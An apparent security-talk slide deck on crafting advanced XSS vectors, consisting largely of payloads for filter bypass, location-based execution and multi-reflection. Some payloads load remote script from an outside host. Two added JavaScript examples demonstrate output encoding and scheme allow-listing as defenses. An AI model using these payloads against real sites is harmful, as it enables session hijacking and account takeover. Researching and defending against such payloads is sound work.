Building Advanced XSS Vectors by @brutelogic
Source: brutelogic.com.br › docs › advanced-xss.pdf
Posted: 28-May-2020
About

About - Agenda
● About
● Vector Scheme
● Vector Builder (webGun)
● Agnostic Event Handlers
● Reusing Native Code
● Filter Bypass
● Location Based Payloads
● Multi Reflection

About - Speaker
● Security researcher @sucurisecurity
● Former #1 @openbugbounty
● Some HoF & acknowledgements
● XSS expert

About - Presentation
● Not just another talk on XSS
● Use of alert(1) for didactic purposes
● Mainly about event based XSS
● Some stuff may be hard to follow

Vector Scheme

● Regular

<tag handler=code>

Example:

<svg onload=alert(1)>

● Full

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Example:

<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA

Mapped onto the scheme: <table> is extra1, %0C (form feed) spacer1, style=font-size:700px extra2, %0D (carriage return) spacer2, onmouseover the handler, %0A (line feed) spacer3, %0B (vertical tab) spacer4, prompt(1) the code, %09 (tab) spacer5 and <td>AAAAAAAAA extra3; the huge font size makes the cell easy to hover.

Vector Builder (webGun)
http://brutelogic.com.br/webgun

● Interactive cheat sheet
● Builder of XSS vectors/payloads
● More than 3k unique combinations
● Event or tag oriented
● Handlers by browser
● Handlers by length*
● Manual vector editing
● Test on target or default test page

* for filter bypass procedure.

Agnostic Event Handlers

● Used with almost any tag
● Ones that work with arbitrary tags (example of an arbitrary tag: <brute)
● Most require UI
● Work on all major browsers

Agnostic Event Handlers - List
● onblur
● onclick
● oncopy
● oncontextmenu
● oncut
● ondblclick
● ondrag
● onfocus
● oninput
● onkeydown
● onkeypress
● onkeyup
● onmousedown
● onmousemove
● onmouseout
● onmouseover
● onmouseup
● onpaste

● Example:

<brute onclick=alert(1)>clickme!

Reusing Native Code

● Example 1

...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script>

● INPUT

"><script>alert(1)//

or

"><script>alert(1)<!--

● Injection

...<input type="hidden" value=""><script>alert(1)//"></form><script type="text/javascript"> function x(){ do something }</script>

● Result

The injected <script> has no closing tag of its own, so the browser treats everything up to the page's native </script> as its body; the // (or <!--, which browser JavaScript also treats as a single-line comment) discards the rest of that line, leaving alert(1) followed by the page's own function x() code:

...<input type="hidden" value=""><script>alert(1)//"></form><script type="text/javascript"> function x(){ do something }</script>

● Example 2

…<input type="hidden" value="INPUT"></form><script type="text/javascript">

function x() {do something

}</script>

● INPUT

"><script src="//brutelogic.com.br/1

or (host written as a decimal IP number)

"><script src="//3334957647/1

● Injection

…<input type="hidden" value=""><script src="//brutelogic.com.br/1"></form><script type="text/javascript">

function x() {do something

}</script>

● Result

The template's own "> after INPUT closes the src attribute and the <script> tag; the page's native </script> closes the element, and the inline text in between is ignored because the script has a src:

…<input type="hidden" value=""><script src="//brutelogic.com.br/1"></form><script type="text/javascript">

function x() {do something

}</script>

Filter Bypass

Filter Bypass - Procedure

● Arbitrary tag + fake handler
● Start with 5 chars, increase
● Example

<x onxxx=1 (5) pass
<x onxxxx=1 (6) pass
<x onxxxxx=1 (7) block

The filter in the example lets handler names of up to 6 characters through, so any real handler of that length is a candidate (this is what webGun's "handlers by length" list is for).

Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow

Filter Bypass - Tricks

● Encoding

%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1

● Mixed Case

<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1

● Doubling

<x onxxx=1 onxxx=1

● Spacers

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1

● Combo

<x%2F1=">%22OnXxx%3D1

● Quotes

<x 1='1'onxxx=1
<x 1="1"onxxx=1

● Mimetism

<x </onxxx=1 (closing tag)
<x 1=">" onxxx=1 (text outside tag)
<http://onxxx%3D1/ (URL)

Location Based Payloads

● Really complex payloads can be built
● document.location properties and similar
● Avoiding special chars (at least between = and >)
● Game over to filter

Location Based Payloads - Document Properties

Each property reads a different part of the URL or page, shown here relative to the injected tag:

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

● location.protocol ("protocol:")
● location.hostname, document.domain ("domain")
● location.origin ("protocol://domain")
● location.pathname ("/path/page")
● location.search (the query string, starting at "?p=")
● previousSibling.nodeValue, document.body.textContent* ("Before": text1)
● tagName, nodeName ("Itself": the tag name)
● outerHTML ("Itself": the whole <tag handler=code> markup)
● innerHTML* ("After": text2)
● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild.nodeValue ("After": text2)
● location.hash ("Hash": "#text3")
● URL, location.href, baseURI, documentURI (the whole URL)

* (may need to close the injected tag)

Location Based Payloads - Evolution 1

<svg onload=location='javascript:alert(1)'>

<svg onload=location=location.hash.substr(1)>#javascript:alert(1)

<svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1)

<svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.source+location.hash.substr(1)>#(1)

<svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.source+location.hash[1]+1+location.hash[2]>#()

Each step removes something a filter could key on: first the javascript: string moves into the hash, then the keywords are split, then the quotes are replaced by regex literals read through .source, and finally even the parentheses come from the hash while the argument is the number 1.

Location Based Payloads - Evolution 2

<javascript onclick=alert(tagName)>click me!

<javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So...

(tagName is reported in upper case, so the code part would become ALERT(1); only the scheme, which is case-insensitive, can be taken from the tag name)

<javascript onclick=location=tagName+location.hash.substr(1)>click me!#:alert(1)

<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)

Splitting javascript: between tag name, inner text and hash:

javascript + :"click me! + #"-alert(1)
javascrip + t:"click me! + #"-alert(1)
javas + cript:"click me! + #"-alert(1)

Location Based Payloads - Taxonomy

● By Type

1. Location
2. Location Self
3. Location Self Plus

● By Positioning (Properties)

Before < Itself > After # Hash

Inside (attributes of the tag itself, such as name and id)

Location Based Payloads - Location

● Location After (innerHTML)

<j onclick=location=innerHTML>javascript&colon;alert(1)//

(the &colon; entity is decoded when the page is parsed, so innerHTML reads back as javascript:alert(1)//)

● Location Inside (name+id)

<svg id=t:alert(1) name=javascrip onload=location=name+id>

● Location Itself + After + Hash (tagName+innerHTML+location.hash)

<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)

<javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'-alert(1)

<javascript onclick=location=tagName+innerHTML+URL>:"-'click me!</javascript>#'-alert(1)

Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)

● Location Itself + Hash (tagName+URL)

<javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1)

("Labeled Jump": in the resulting javascript: URL, http: parses as a JavaScript label, // comments out the rest of the URL up to the newline that %0A decodes to, and alert(1) is the next statement)

<javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)

Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)

● Location After + Hash (innerHTML+URL)

<j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1)

<j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)

● Location Itself + After + Hash (tagName+innerHTML+URL)

<javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'-alert(1)

<javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)

● Location Itself + Before (tagName+previousSibling)

"-alert(9)<javascript:" onclick=location=tagName+previousSibling.nodeValue>click me!

● Location Itself + After + Before (tagName+innerHTML+previousSibling)

'-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:'click me!

● Location After + Itself (innerHTML+outerHTML)

<alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<!-- -->

Result: javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- -->

<j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:/*click me!

Result: javascript:/*click me! + <j 1="*/""-alert(1)<!-- …

● Location After + Before + Itself (innerHTML+previousSibling+outerHTML)

*/"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!

Result: javascript:/*click me! + */" + <j"-alert(9)<!-- ...

*/"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!

Result: javascript:/*click me! + */" + <j 1="-alert(9)//" ...

Location Based Payloads - Location Self

"Self" payloads assign a relative URL (starting with ?p=) to location, so the page reloads itself with the vector taken from the injected element's attribute or text instead of from the original parameter.

● Location Self Inside

p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>

http://...?p=<svg/onload=alert(1)+

p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>

http://...?p=<script/src=//brutelogic.com.br/1+

● Location Self After

p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>

http://...?p=<svg/onload=alert(1)>

Location Based Payloads - Location Self Plus

"Self Plus" payloads use location+= to append to the current URL, adding a second p parameter (%26 is an encoded &).

● Location Self Plus Itself

p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!

http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick="location+=outerHTML">

● Location Self Plus After

p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>

http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>

● Location Self Plus Before

p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!

http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
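As an added example (not from the slides), a Node.js model of how the location-based handlers above assemble their navigation target from DOM properties, together with the scheme allow-list a defender applies to anything that is assigned to location. The elementView and assemble helpers and the example base URL are this example's own assumptions; element properties are supplied by hand because no DOM is involved.

```javascript
// Added example, not from the slides: a Node.js model of how the location-based
// handlers assemble a navigation target from DOM properties, plus the scheme check a
// defender applies to any value that ends up in location. No DOM is used; the
// element's properties are supplied by hand, as the browser would expose them.

// Browser facts the model reproduces: tagName of an HTML element is reported in upper
// case; location.hash keeps its leading '#'; innerHTML is the markup between the tags;
// previousSibling.nodeValue is the text node immediately before the element.
function elementView({ before = '', tagName, innerHTML = '', hash = '' }) {
  return {
    previousSibling: { nodeValue: before },
    tagName: tagName.toUpperCase(),
    innerHTML,
    location: { hash: hash === '' ? '' : '#' + hash },
  };
}

// Evaluate a handler expression of the slides' shape, e.g.
// "tagName+innerHTML+location.hash", by resolving each dotted path against the view.
function assemble(view, expression) {
  return expression.split('+')
    .map(path => path.split('.').reduce((obj, key) => obj[key], view))
    .join('');
}

// The evasion property the slides point out: between '=' and '>' the handler contains
// only identifier characters, dots and '+', so a filter looking for quotes,
// parentheses or colons in the handler value sees nothing.
function handlerHasOnlyIdentifierChars(handlerValue) {
  return /^[A-Za-z0-9_.+=]+$/.test(handlerValue);
}

// Defender side: what the browser does with the assembled string. The URL parser
// lowercases the scheme, so the upper-cased tagName still yields a javascript: URL.
// Anything that is navigated to should be parsed and allow-listed by scheme first.
function navigationScheme(target, base = 'https://example.test/page') {
  try { return new URL(target, base).protocol; } catch { return null; }
}
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
function isAllowedNavigation(target) {
  return ALLOWED_SCHEMES.has(navigationScheme(target));
}

// Two vectors from the slides walked through the model.
function demo() {
  // <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)
  const itselfAfterHash = assemble(
    elementView({ tagName: 'javascript', innerHTML: ':/*click me!', hash: '*/alert(1)' }),
    'tagName+innerHTML+location.hash');
  // "-alert(9)<javascript:" onclick=location=tagName+previousSibling.nodeValue>click me!
  const itselfBefore = assemble(
    elementView({ before: '"-alert(9)', tagName: 'javascript:"', innerHTML: 'click me!' }),
    'tagName+previousSibling.nodeValue');
  return {
    itselfAfterHash, itselfBefore,
    schemes: [navigationScheme(itselfAfterHash), navigationScheme(itselfBefore)],
    handlerLooksHarmless: handlerHasOnlyIdentifierChars('location=tagName+innerHTML+location.hash'),
    allowed: [isAllowedNavigation(itselfAfterHash), isAllowedNavigation('/next?p=1')],
  };
}

console.log(demo());
```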

Multi Reflection

Multi Reflection - Single Input

● Double Reflection - Single Input

p='onload=alert(1)><svg/1='

Reflected twice: the first copy opens <svg with an attribute 1=' whose quoted value swallows the page's own markup up to the second copy, where the closing ' and onload=alert(1)> complete the tag.

'onload=alert(1)><svg/1='

… [code] …

'onload=alert(1)><svg/1='

● Double Reflection - Single Input (script)

p='>alert(1)</script><script/1='

p=*/alert(1)</script><script>/*

*/alert(1)</script><script>/*

… [code] …

*/alert(1)</script><script>/*

● Triple Reflection - Single Input

p=*/alert(1)">'onload="/*<svg/1='

p=`-alert(1)">'onload="`<svg/1='

`-alert(1)">'onload="`<svg/1='

… [code] …

`-alert(1)">'onload="`<svg/1='

… [code] …

`-alert(1)">'onload="`<svg/1='

● Triple Reflection - Single Input (script)

p=*/</script>'>alert(1)/*<script/1='

*/</script>'>alert(1)/*<script/1='

… [code] …

*/</script>'>alert(1)/*<script/1='

… [code] …

*/</script>'>alert(1)/*<script/1='

Multi Reflection - Multi Input

● 2 inputs:

p=<svg/1='&q='onload=alert(1)>

● 3 inputs:

p=<svg 1='&q=onload='/*&r=*/alert(1)'>
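As an added example (not from the slides), the point behind the Filter Bypass, Reusing Native Code and Multi Reflection sections in Node.js: a signature filter of the kind the bypass tricks defeat is run over vectors copied from the slides, beside output encoding applied at each reflection point, which does not need to recognise any vector. The filter pattern, the page templates and the tag-counting check are this example's own constructions.

```javascript
// Added example, not from the slides: a blocklist "XSS filter" of the kind the
// Filter Bypass slides defeat, next to the mitigation that needs no knowledge of
// vectors at all: contextual output encoding. Node.js, no DOM required.

// A typical signature filter: it expects "<tag", whitespace, "on...=" (or "<script").
// The "/" spacer, mimetism and multi-reflection vectors on the slides do not look like that.
const NAIVE_PATTERN = /<script|<[a-z]+\s+on[a-z]+\s*=/i;
function naiveFilterBlocks(input) {
  return NAIVE_PATTERN.test(input);
}

// Output encoding for HTML text and quoted-attribute contexts: the five characters
// that can change the parser's state. It does not care what the input looks like.
const ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(input) {
  return input.replace(/[&<>"']/g, ch => ENTITY[ch]);
}

// Three reflection points from the slides, {{INPUT}} standing for the reflected
// parameter: text between tags ("text1 <tag> text2"), the hidden-input value of the
// "Reusing Native Code" example, and a page that reflects the same input twice
// ("Double Reflection - Single Input"). The templates are constructed for this example.
const TEMPLATES = {
  text:   '<p>text1 {{INPUT}} text2</p>',
  attr:   '<input type="hidden" value="{{INPUT}}"></form>' +
          '<script type="text/javascript"> function x(){ } </script>',
  double: '<p>{{INPUT}}</p><div>code</div><p>{{INPUT}}</p>',
};
const BASELINE = { text: 2, attr: 4, double: 6 }; // start/end tags each template has by itself

function render(context, value, encode) {
  const v = encode ? encodeForHtml(value) : value;
  return TEMPLATES[context].split('{{INPUT}}').join(v);
}

// Count start and end tags in the rendered markup; anything above the baseline is a
// tag the input created, a rough proxy for "the parser left the intended context".
function countTagOpeners(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}

// For one vector (URL-decoded, as the server sees it): would the signature filter
// block it, and how many tags does it add when reflected raw versus encoded?
function evaluate(context, vector) {
  return {
    blockedByFilter: naiveFilterBlocks(vector),
    extraTagsRaw: countTagOpeners(render(context, vector, false)) - BASELINE[context],
    extraTagsEncoded: countTagOpeners(render(context, vector, true)) - BASELINE[context],
  };
}

// Vectors copied from the slides: the regular one, a spacer bypass, a mimetism bypass,
// the native-code-reuse injection and the double-reflection stitch.
const SLIDE_VECTORS = {
  regular:       { context: 'text',   vector: '<svg onload=alert(1)>' },
  slashSpacer:   { context: 'text',   vector: '<x/onxxx=1>' },
  mimetism:      { context: 'text',   vector: '<x 1=">" onxxx=1>' },
  nativeReuse:   { context: 'attr',   vector: '"><script>alert(1)//' },
  doubleReflect: { context: 'double', vector: "'onload=alert(1)><svg/1='" },
};
function report() {
  const out = {};
  for (const [name, { context, vector }] of Object.entries(SLIDE_VECTORS)) {
    out[name] = evaluate(context, vector);
  }
  return out;
}

console.log(report());
```

The filter blocks only the two vectors that look the way it expects, while encoding leaves every reflection with zero extra tags.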

Conclusion

● XSS vectors can:
- be complex;
- easily evade filters;
- blow your mind.

Thanks! @brutelogic